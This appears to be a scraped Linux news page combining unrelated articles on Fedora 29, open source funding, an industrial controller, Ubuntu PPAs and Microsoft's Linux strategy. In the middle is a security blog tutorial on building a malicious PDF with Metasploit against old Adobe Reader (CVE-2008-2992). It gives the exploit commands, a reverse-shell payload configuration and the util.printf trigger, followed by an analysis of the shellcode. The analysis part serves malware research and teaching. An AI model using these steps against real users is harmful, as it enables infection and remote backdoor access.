Linux Blimp

Most Popular

• Linux Commands Cheat Sheet
• Linux ip Command Networking Cheat Sheet
• Vim Cheat Sheet
• Linux System Administrator Projects
• 1,500 Coding Project Ideas

Recent Linux Articles

• Linux Jobs and Processes
• Linux Certification Paths
• Managing Linux Users and Groups
• Linux Disk Management
• Linux System Logs and the Syslog Standard

Topics

Arch Linux
careers
CentOS
cheat sheet
Cloud
Command Line
Debian
Desktop
Fedora
File System
FTP
Gentoo
Installation
jobs
Linux
Linux Mint
Mageia
MySQL
Nginx
OpenSuse
Programming
Python
RedHat
SCP
Server
Shell Scripting
Slackware
SSH
text editor
Ubuntu
Vagrant
Video
vim
VirtualBox
Web Hosting
Windows

Source

Fedora 29 Workstation – See What’s New

Fedora 29 Workstation is the new release of Fedora Linux Distribution, ships with the latest GNOME 3.30 as default desktop environment and powered by the latest Linux Kernel 4.18 series. Also, include the latest most of GNOME 3.30 applications.

GNOME Software now supports automatic updates for Flatpak in Fedora 29. Flatpak is a next-generation technology for building and distributing desktop applications on Linux. It makes it easy for software makers to support multiple distributions with one format.

GNOME Boxes now supports connecting to remote Windows machines using RDP. You can attach to Windows systems from the comfort and security of your Fedora Workstation, with the same easy interface as your virtual machines.

Download Fedora 29: https://getfedora.org/workstation
Source

Infected PDFs have always been a privileged way to infect users because this document format is very common and used by almost everyone. Moreover, it exists many ways to exploit Acrobat Reader vulnerabilities and it’s very stealth and elegant way to launch a malware.

In this article, I will show you how easy it is to craft a malicious PDF with custom shellcode, and trigger a vulnerability to execute a payload. We will also analyse the malicious PDF to learn how the payload is stored, and how to extract it.

This article is for research purpose only, don’t do bad things!

PDF is object oriented format, defined by Adobe. This format describes a document organization, and preserves dependencies needed for the document (fonts, images, …). These objects are stored within the document as streams and most of the time encoded or compressed. Below is the overview of a classic PDF document. For more information, please read Adobe’s specifications.

Infected PDF creation

We will create a fake PDF with metasploit, containing an exploit attempt, as well as a custom payload (code to execute). The exploit is targeting a specific version of Adobe Reader, so we will need to make some archaeology and find an ancient Reader version (thanks to http://www.oldapps.com/) to install on the target machine.

So, first, let’s make this PDF. We will make a infected PDF that just opens calculator (calc.exe) on the machine, just for demonstration. Open a metasploit console (installation of metasploit is not covered in this article) and type:

use exploit/windows/fileformat/adobe_utilprintf set FILENAME malicious.pdf set PAYLOAD windows/exec set CMD calc.exe show options exploit

It should look like this:

Copy the file that has just been created (here /home/osboxes/.msf4/local/malicious.pdf) on a shared drive. You will need to feed your target machine with it.

Infected PDF execution

On the target machine, download and install a vulnerable Adobe Reader version (metasploit tells us it should be less than 8.1.2). I choose to install a 8.1.1 version.

Once installed, execute the malicious.pdf file. You should see a calculator being spawned from the Adobe Reader process. That’s the exploit.

I’ve done another PDF but changed the payload slightly, just for fun:

set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.29 set LPORT 4455

Here’s the result. Adobe Reader now has a backdoor (reverse shell) listening for commands.

Infected PDF analysis

Played enough! Let’s see what’s inside that malicious PDF, and let’s try to extract the malicious payload(we’re still with the calc.exe PDF).

First, we will need a tool called PDF Stream Dumper, so download it. Load the malicious PDF with it, and take some time to familiarize yourself with the tool.

We can start by checking if some exploit is detected by the tool using the “Exploit Scan” menu:

Exploit CVE–2008–2992 Date:11.4.08 v8.1.2 – util.printf – found in stream: 6

Indeed, there’s an exploit hidden in stream 6 (the one in blue on the capture).

But let’s start by the beginning: when searching for exploits in a PDF, we most of the time encounter heap spray created by a Javascript code. That heap spray is used to push the payload on the heap, ready to be executed once the vulnerability has triggered.

If you open Stream 1, you can see:

/Type/Catalog/Outlines 2 0 R/Pages 3 0 R/OpenAction 5 0 R

That we can translate to OpenAction on stream 5. Let’s move to stream 5:

/Type/Action/S/JavaScript/JS 6 0 R

Which says to execute Javascript located in stream 6. This stream shows plain Javascript, it’s time to open the “Javascript_UI” menu. We immediately recognize a big string hex encoded, and pushed into a variable for heap spray. This is our payload:

Fortunately, we have tools to manipulate it, and understand what it does. Select the payload (the part between quotes), and open “Shellcode_analysis” menu. Then choose “scDbg – LibEmu Emulation”. You will get a new window will the shellcode decoded into bytes (you can even save it to file):

LibEmu is a library able to simulate a processor, it gives information about what the assembly code is trying to do. Just hit the “Launch” button and you will understand:

Here it is, we can clearly see the shellcode will just opens a calc.exe window and exits.
Let’s redo the same analysis for the other malicious PDF (reverse shell):

Uh, self explaining right? Shellcode is loading the library needed to manipulate sockets (ws2_32.dll), and tries to connect back to C&C.

I haven’t told about the exploit itself, it’s located at the end of the javascript code (like stated by Exploit search, “util.printf – found in stream: 6”). It’s exploiting a buffer overflow on printf function to execute arbitrary code (here, our heap-sprayed shellcode)

util.printf(“%45000.45000f”, 0);

I hope you enjoyed this blog post, please like, comment or share, or do all of that, it’s up to you. Also, thanks for the visit 😉

Author: tigzy

Founder and owner of Adlice Software, Tigzy started as lead developer on the popular Anti-malware called RogueKiller. Involved in all the Adlice projects as lead developer, Tigzy is also doing research and reverse engineering as well as writing blog posts.

Source

In this edition of our open source news roundup, we take a look at two open source companies getting funding, the FDA open sources app code, Barcelona upping its open source investment, and more.

Open source firms finish funding rounds

In the last two weeks, IBM’s acquisition of Red Hat led the open source business headlines. But two other companies that develop open source software also made some bold financial moves that filled their coffers quite nicely.

Hashicorp announced it has raised $100 million from two venture capital firms. The maker of tools for managing cloud applications plans to use that funding “to boost its open-source and commercial product development roadmaps, accelerate hiring and step up customer-facing activities such as training.” That funding also helped push the company’s valuation to $1.9 billion (USD).

Neo4j, which develops open source graph databases, didn’t do too badly, either. The company pulled in $80 million (USD) in investments, which doubles the amount of funding it’s managed to attract. According to Neo4j’s CEO Emil Eifrem, the company will use that money to “grow its developer tools and support popular use cases.” Eifrem add that the infusion of cash also provides “Neo4j with the resources to serve our new and existing customers with the best graph platform to harness connected data for AI.”

FDA releases open source code

The Food and Drug Administration (FDA) in the United States has open sourced the code for its MyStudies app. The app, which is available for Android and iOS, enables medical researchers to collect patient data for use in clinical trials and studies.

The source code and documentation for MyStudies is available on on GitHub and the FDA hopes that “developers or hospital and academic medical center researchers can customize and rebrand MyStudies for their own purposes.”

Barcelona increases its investment in open source

The city of Barcelona has reach an important milestone. This year, almost 80% of the city’s IT budget is devoted to open source. On top of that, Barcelona has made eight of its projects available on GitHub, with seven more to follow.

Xavier Roca, Barcelona’s director of IT development, says the city intends to link almost all of its IT spending to open source by 2020. Until then, Roca says, Barcelona will “continue to work with proprietary software solutions, as we have systems in place that require maintenance.”

Analyzing emotions with open source software

Machines are getting closer to better recognizing human emotions, thanks to open source software developed by a team of European researchers. Called the MixedEmotions Toolkit, the software can learn to recognize “emotions through text, audio and video processing.”

Mixed Emotions is made up of several modules that analyze text and multimedia and relationships in social networks, and does machine translation between several European languages. The researchers also developed a Python package called Senpy, “for developing and publishing emotion analysis services and tools, mainly focused on text processing.”

The source code for the toolkit is available on GitHub.

In other news

• Atlassian sells Jitsi videoconferencing tool
• OVH: the open source public cloud alternative from Paris
• RISC OS goes Open Source, supports royalty-free Raspberry Pi projects
• Open Source as a Model for Global Education
• Why one company is paying developers to write more open source code

Source

Techbase is shipping a Linux-friendly industrial automation controller called the ModBerry M2000 based on the UP Squared SBC, featuring GbE, SATA, and M.2.

Polish development firm Techbase offers a growing family of industrial control computers based on popular SBCs such as the Raspberry Pi 3B+ based ModBerry M500 and UP board based ModBerry M1000. Now, it has added an M2000 model built on Aaeon’s UP Squared SBC. While the M1000’s UP board uses a 1.44GHz Intel Cherry Trail Atom processor, the M2000’s UP Squared advances to an Intel Apollo Lake chip.

The ModBerry M2000 offers a choice of a dual-core, up to 2.4GHz Celeron N3350 or a quad-core, up to 2.5GHz Pentium N4200. Linux, Android, and Windows are available.

ModBerry M2000 (left) and UP Squared

The ModBerry M2000 provides twice the maximum RAM and eMMC storage as the M1000, with a choice of 2GB, 4GB, or 8GB RAM and 16GB to 128GB eMMC. Unlike the M1000, you get SATA 3.0 and M.2 slots for additional storage, as well as dual standard GbE ports.

Other features on this highly modular system are almost identical to the M1000, including up to 26x DIO, 24x analog inputs, 36x analog outputs, and 12x relay outputs. The system is further equipped with HDMI and USB 3.0 ports, a 1-wire interface, and up to 12x serial ports. Options include a 1-inch OLED display, a Supercap UPS, battery support, a CAN port, an IP67 enclosure, and a wide temperature range.

M2000 feature comparison with other ModBerry systems (left) and wireless, ExCard, and mBus add-on options

As with other ModBerry systems, you can add up to three wireless modules and/or ExCard and mBus I/O modules via side-mounted add-on compartments (see charts above). Wireless features include different types of WiFi, Bluetooth, ZigBee, WMBus, and LoRa. You can also choose from among 2G, 3G, LTE Cat 3, and NB-IoT cellular options, each accompanied by optional or standard GPS. ExCards include additional serial, Ethernet, analog, digital, and relay I/O, among other options.

Like its siblings, the ModBerry M2000 ships with iMod software to support protocols such as MQTT, MODBUS, SNMP, and MBus. iMod offers an easier alternative to the underlying PLC software, which is still accessible. Optional software includes PLC Codesys, a notification controller, and an application for C-L-V (Convert-Log-Visualize) usage.

Further information

The ModBerry M2000 is available now. Off-the-shelf pricing is not listed, since the ModBerry systems are modularly customizable and “the sales department prices every configuration separately” based on the customer’s specific requirements. More information may be found in Techbase’s ModBerry M2000 announcement, as well as its ModBerry M-series product/configuration page and ModBerry home page.

Source

Nov 10, 2018

Source

News briefs for November 12, 2018.

The Fedora team
announces that the latest version of the Nest simulator is now available in Fedora as
part of the NeuroFedora initiative. Nest allows computational neuroscientists to “make large scale
computer models of the brain that are needed to investigate among other things, how the brain
processes information”. Nest provides an easy to use Python interface and it can be run on both
laptops and supercomputing clusters.

Cloudflare’s 1.1.1.1 DNS service comes to Android and iOS. According to The
Verge, “The mobile app uses features like VPN support to push your mobile traffic towards the
1.1.1.1 DNS servers and improve speeds. It will also prevent your carrier from tracking your browsing
history and potentially selling it. Cloudflare is promising not to track 1.1.1.1 users or sell ads,
and the company has retained KPMG to perform an annual audit and publish a public report.” You can download it
for Android here.

The Ceph storage project receives a dedicated open-source foundation, hosted by The Linux
Foundation. TechCrunch
quotes Sage Weil, Ceph’s co-creator, project leader, and chief architect at Red Hat for Ceph:
“Today’s launch of the Ceph Foundation is a testament to the strength of a diverse open source
community coming together to address the explosive growth in data storage and services.”

Valve appears to be making its own VR headset. GamingOnLinux
reports that a leaked imgur album shows several photos
of the new hardware with a Valve logo. Valve also is apparently working on new Half-Life
title for VR.

Sparky Linux 4.9 has been released, which celebrates 100 years of Poland’s independence. Sparky 4.9 offers
the LXDE desktop environment and minimal images of MinimalGUI (Openbox) and MinimalCLI (text mode), so
you can “install the base system with a desktop of your choice with a minimal set of applications, via
the Sparky Advanced Installer”. In addition to added packages and updates, this new version has the code name “100”,
commemorating the 100 anniversary of Poland’s
independence, and it provides information about Polish
history and also includes new Poland nature wallpapers.

Source

Learn how to align your goals for managing and creating open source software with your organization’s business objectives using the tips and proven practices from the TODO Group.

The majority of companies using open source understand its business value, but they may lack the tools to strategically implement an open source program and reap the full rewards. According to a recent survey from The New Stack, “the top three benefits of open source programs are 1) increased awareness of open source, 2) more speed and agility in the development cycle, and 3) better license compliance.”

Running an open source program office involves creating a strategy to help you define and implement your approach as well as measure your progress. The Open Source Guides to the Enterprise, developed by The Linux Foundation in partnership with the TODO Group, offer open source expertise based on years of experience and practice.

The most recent guide, Setting an Open Source Strategy, details the essential steps in creating a strategy and setting you on the path to success. According to the guide, “your open source strategy connects the plans for managing, participating in, and creating open source software with the business objectives that the plans serve. This can open up many opportunities and catalyze innovation.” The guide covers the following topics:

1. Why create a strategy?
2. Your strategy document
3. Approaches to strategy
4. Key considerations
5. Other components
6. Determine ROI
7. Where to invest

The critical first step here is creating and documenting your open source strategy, which will “help you maximize the benefits your organization gets from open source.” At the same time, your detailed strategy can help you avoid difficulties that may arise from mistakes such as choosing the wrong license or improperly maintaining code. According to the guide, this document can also:

• Get leaders excited and involved
• Help obtain buy-in within the company
• Facilitate decision-making in diffuse, multi-departmental organizations
• Help build a healthy community
• Explain your company’s approach to open source and support of its use
• Clarify where your company invests in community-driven, external R&D and where your company will focus on its value added differentiation

“At Salesforce, we have internal documents that we circulate to our engineering team, providing strategic guidance and encouragement around open source. These encourage the creation and use of open source, letting them know in no uncertain terms that the strategic leaders at the company are fully behind it. Additionally, if there are certain kinds of licenses we don’t want engineers using, or other open source guidelines for them, our internal documents need to be explicit,” said Ian Varley, Software Architect at Salesforce and contributor to the guide.

Open source programs help promote an enterprise culture that can make companies more productive, and, according to the guide, a strong strategy document can “help your team understand the business objectives behind your open source program, ensure better decision-making, and minimize risks.”

Learn how to align your goals for managing and creating open source software with your organization’s business objectives using the tips and proven practices in the new guide to Setting an Open Source Strategy. And, check out all 12 Open Source Guides for the Enterprise for more information on achieving success with open source.

Source

If you’re using Ubuntu, you’re already familiar with the software repository. It’s a HUGE collection of all the necessary tools Ubuntu needs to run. The repository is always kept up-to-date with the latest versions of the software. However, you’re already aware that all the software aren’t present in the repository. There are a number of essential tools that you need to get from other sources. Even after grabbing those apps, you have to make sure that they are up-to-date. For solving this issue, Ubuntu features a great method – PPA.

A PPA (Personal Package Archive) is a special software repository that allows the APT (Advanced Packaging Tool) to automatically grab a specific software from that repository. PPA offers an easier method of getting the latest software without any delay. All you have to do is command “apt” to upgrade your system. Most of the world’s PPAs are hosted on Launchpad. However, there are a number of private PPAs hosted on different sites.

How to add a PPA

At first, find out what PPA you need to add. For adding a PPA, it’s the easiest to use the terminal command. The command uses the following structure –

sudo add-apt-repository ppa:abc/xyz

Let’s have a quick breakdown of each part of the command.

• sudo – Running the command with “root” privilege.
• add-apt-repository – The tool for adding the PPA.
• ppa:abc/xyz – The repository code.

For this example, we’ll be using the uGet official PPA.

Run the following command –

sudo add-apt-repository ppa:plushuang-tw/uget-stable

Installing the software

Now, your system is ready to get your target software. However, make sure that your “apt” repository database is up-to-date with the latest addition of the above PPA.

Install uGet –

Voila! uGet is installed!

Removing the PPA

If you don’t need a PPA anymore, it’s best to remove it from your system.

• Method 1

The best way of removing a PPA is through the command.

Run the following command –

sudo add-apt-repository –remove ppa:plushuang-tw/uget-stable

Don’t forget to update your “apt” database cache –

• Method 2

You can also remove the PPA using the GUI method.

From the menu, search for “software”.

Open Software & Updates.

Open the “Other Software” tab.

Here, you’ll find out all the PPAs you added in your system over the lifetime.

Select the unwanted PPA(s) and hit “Remove”.

When closing, make sure that you reload the software repository database of “apt”.

Voila! PPA is removed!

Enjoy!

Source

Once described by Microsoft as “a cancer,” the Linux world has become a key focus for Microsoft these days, especially as part of the company’s transformation started shortly after Satya Nadella took over the CEO role from Steve Ballmer.

With Nadella at the helm of the company, the software giant has made it very clear that “Microsoft loves Linux,” and this message has been reiterated pretty much with every single occasion.

At some level, this makes perfect sense, as Microsoft has become more interested in developers, and in their turn, developers are often deeply committed to the Linux ecosystem.

But for a company that stood so firmly against Linux, this is quite a change of mind. And not only that Microsoft likes Linux, but even Steve Ballmer, the former company leader who used the cancer phrase, thinks the open-source world is worth the love.

These days, instead of fighting against Linux, Microsoft wants to make this platform its own ally in a struggle to transform Windows 10 in the operating system for virtually everything and everyone.

Linux now runs on top of Windows 10 thanks to a feature called Windows Subsystem for Linux, and several super-popular distributions are available in the Microsoft Store, including Ubuntu. Microsoft joined forces with quite a lot of Linux companies, and a substantial share of Linux developers are now using Windows 10 thanks to the improvements mentioned above.

However, Windows 10 is far from becoming the operating system for everyone, as Microsoft itself hopes. And the most recent blunders that the software giant produced on its own show once again that an alternative to Windows 10 does exist, and that alternative is Linux.

Sure, many people think switching to Apple is the right way to go given the somewhat more user-friendly approach, but the overall costs of this transition is what pushes more people to Linux. Apple continues to build devices that are way too expensive for a significant share of computer users, so it’s either Windows or Linux for many out there.

Ubuntu is now available for Windows 10 users from the Microsoft Store

One of those blunders that made some users look beyond Windows is the October 2018 Update fiasco. Launched on October 2 with much fanfare, Windows 10 October 2018 Update, also referred to as version 1809, was pulled only a few days later after Microsoft discovered a critical bug which might have caused the removal of user files stored in libraries.

The next few weeks were all about further bugs discovered in Windows 10 version 1809, and this update eventually turned out to be one of the buggiest releases in a long time.

As a result, I’ve seen quite a lot of people praising the world of Linux, and some of our readers told me this is something you don’t see happening on distributions like Ubuntu or Linux Mint. Of course, there’s no flawless operating system out there, but for many users, the Windows 10 version 1809 fiasco was just too much to continue using Microsoft products.

Statistics, however, don’t seem to indicate that an en-masse migration to Linux is happening right now, though there’s actually a chance that more users are actually exploring such a switch in the coming months. Linux isn’t exactly the right operating system for everyone, as it’s the case of gamers, for instance, but on the other hand, it serves quite a wide array of purposes with advanced functionality you don’t find on Windows.

Getting in touch with users is always the best way to receive feedback on a certain product, service, or trend, and because Microsoft has such a hard time getting Windows right, you are definitely the ones that should help guide the company towards its final goal of making Windows the best OS for everyone.

Why did you give up on Windows and switched to Linux? What does Microsoft need to do to win you back? Is there any Linux feature you’d want to see on Windows?

Let us and Microsoft know what you think in the box below.

Source